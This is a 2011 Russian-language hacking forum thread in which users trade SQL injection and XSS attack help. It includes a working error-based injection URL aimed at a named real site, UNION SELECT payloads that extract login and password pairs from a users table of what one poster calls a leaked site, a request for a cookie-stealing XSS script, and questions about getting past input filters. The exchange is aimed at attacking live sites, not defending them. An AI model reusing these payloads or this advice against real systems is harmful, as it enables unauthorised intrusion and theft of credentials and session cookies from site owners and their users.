10.02.2011, 00:47
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
насчёт той скули, которая была в корне раздела ( http://chatium.com/user/profile?id=\' )
http://chatium.com/user/profile?id=1\') and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) -- 1
|
|
|
10.02.2011, 14:40
|
|
Постоянный
Регистрация: 02.02.2011
Сообщений: 727
С нами:
8039126
Репутация:
-6
|
|
активная xss
помогите составить правельный скрипт чтобы куки передались.....
|
|
|
|
10.02.2011, 16:04
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
http://forum.antichat.net/thread44125.html в статье расписано всё как нельзя лучше
|
|
|
|
10.02.2011, 17:37
|
|
Постоянный
Регистрация: 02.02.2011
Сообщений: 727
С нами:
8039126
Репутация:
-6
|
|
........
|
|
|
|
10.02.2011, 19:06
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
я бы сделал например такой сниффер, чтобы он возвращал картинку:
По памяти пишу, могут быть какие-то мелкие ошибки, но идея думаю ясна |
|
|
|
10.02.2011, 20:49
|
|
Участник форума
Регистрация: 15.01.2009
Сообщений: 158
С нами:
9116253
Репутация:
26
|
|
Подскажите со скулёй.
Ковырялся на денвере в скриптах одного слитого сайта, на локалке все прекрасно работает, а в сети не хочет.
На денвере провожу запросы вида:
Код:
' UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7 FROM users/*
' UNION SELECT 1,concat(login,0x3a,password),3,4,5 FROM users LIMIT 1,1/*
//Количество столбцов разное т.к. делаю через разные скрипты.
А на серваке не хочет ничего делать:
И так
Код:
' UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7 FROM users/*
' UNION SELECT 1,concat(login,0x3a,password),3,4,5 FROM users LIMIT 1,1/*
и вот так
Код:
' UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7 FROM users --
' UNION SELECT 1,concat(login,0x3a,password),3,4,5 FROM users LIMIT 1,1 --
В ответ получаю:
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '--' limit 1' at line 1
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' limit 1' at line 1
Что ещё можно попробовать? |
|
|
|
10.02.2011, 21:36
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
попробуй выложить скрипт
|
|
|
|
10.02.2011, 22:24
|
|
Участник форума
Регистрация: 15.01.2009
Сообщений: 158
С нами:
9116253
Репутация:
26
|
|
Сообщение от None
попробуй выложить скрипт
GPRS, замучаюсь. Только разобрался путём тыка:
После коммента -- поставил + и всё заработало =))
|
|
|
|
11.02.2011, 23:43
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]filter_var[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]FILTER_SANITIZE_STRING[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
Долее переменная $text вставляется в запрос ".... WHERE text='".$text."' ...."
Возможно ли обойти данный фильтр? |
|
|
|
12.02.2011, 02:36
|
|
Новичок
Регистрация: 22.02.2010
Сообщений: 5
С нами:
8534596
Репутация:
2
|
|
если же в скрипте фильтруются кавычки, а возможно что-то еще, в следствии чего выводит "Hacking attempt!" возможно ли обойти?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
|
|
|
|
Похожие темы
Комбинированный вид
